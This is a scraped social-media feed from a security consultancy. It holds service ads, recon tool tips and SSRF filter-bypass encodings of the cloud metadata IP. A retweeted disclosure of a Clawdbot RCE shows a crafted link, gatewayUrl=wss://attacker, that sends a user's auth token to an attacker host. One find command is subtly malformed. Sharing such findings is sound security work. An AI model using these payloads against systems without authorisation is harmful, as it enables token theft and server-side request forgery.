Joined April 2021
324 Photos and videos
Pinned Tweet
2 Feb 2024
Our cybersecurity services: 🕸 Web application penetration testing 🌐 Network penetration testing 💪 Secure development training ⚔️ EASM 🏷 Whitelabeled services ☁️ Cloud security reviews 👮 General security consulting DM us for details 📨 haksec.io
1
9
3,520
haksec.io retweeted
If you are marketing a cybersecurity company, you need to watch this 👀
3
4
22
3,050
haksec.io retweeted
🚨We found RCE in Clawdbot 🚨 If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.  The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian". Here's how it went down 👇 We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load. Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏 On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token! Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇 ethiack.com/news/blog/one-cl…
24
157
671
121,114
12 Dec 2024
Could this be the longest way to perform Google dorks? 😂
1
3
7
1,252
18 Oct 2024
How to quickly find any mention of something in your files with the find command: ⌨️ find . -name "*zdns*" 2>1& Watch this 📺👇
2
5
849
17 Oct 2024
Mass-perform AXFR requests on domains with hakaxfr! A simple Go tool for attempting zone transfers. Install here: github.com/hakluke/hakaxfr
1
6
641
28 Aug 2024
Need to extract the root domains from a list of subdomains? Try using dsieve by @trick3st! Really handy tool for filtering and enriching a list of subdomains!
2
4
27
2,404
18 Aug 2024
Using 3 words or less, why did you start hacking?
6
1
10
1,426
14 Aug 2024
EASM is not just for defenders. It can also be used for offensive security! Here are some advanced subdomain recon techniques for your own (offensive) EASM 👇 labs.detectify.com/how-to/ad…
520
9 Aug 2024
Anyone else do this or just me?
1
1
6
846
8 Aug 2024
What's the dumbest solution to a tech problem that actually worked?
1
3
728
31 Jul 2024
Check the rep of an email address with emailrep.io! Discover if an email is linked to suspicious activity or if it is legit! Great for your next OSINT investigation!
1
4
720
25 Jul 2024
A quick way to get the ASN details of an organization using @pdiscoveryio's ASNmap! ⌨️ asnmap -org PAYPAL -json | jq -r .as_number | sort -u
20
90
4,540
23 Jul 2024
Every customer's security needs are unique, that's why we pride ourselves on providing bespoke solutions including: - Web app and network penetration testing - Secure dev training - EASM - Whitelabeling - Cloud security reviews - General consulting haksec.io/
1
1
9
899
21 Jul 2024
You can choose one vulnerability scanner, what is it?
3
1
6
2,226
18 Jul 2024
Dump DNS records en masse with zdns! As you can see below, Paypal have TXT records related to Notion, Stripe and Miro! Install here: github.com/zmap/zdns
7
14
34
3,895
17 Jul 2024
Get CIDR ranges associated with an organization with @pdiscoveryio's ASNmap! All you need to do is "asnmap -org <ORG-NAME>" and you'll get a list CIDRs to do with as you so please!
1
25
87
4,272
16 Jul 2024
If your SSRF attempts don't work initially, there are some common bypasses you can try. Here's are 4 techniques to bypass SSRF filters:
2
9
60
7,360
16 Jul 2024
4. Non-standard IP notations can sneak past filters looking for 169.254.169.254 specifically. Try octal (025177524776), hex (0xa9fea9fe), integer (2852039166), or IPv6 (::ffff:a9fe:a9fe) notation.
1
4
599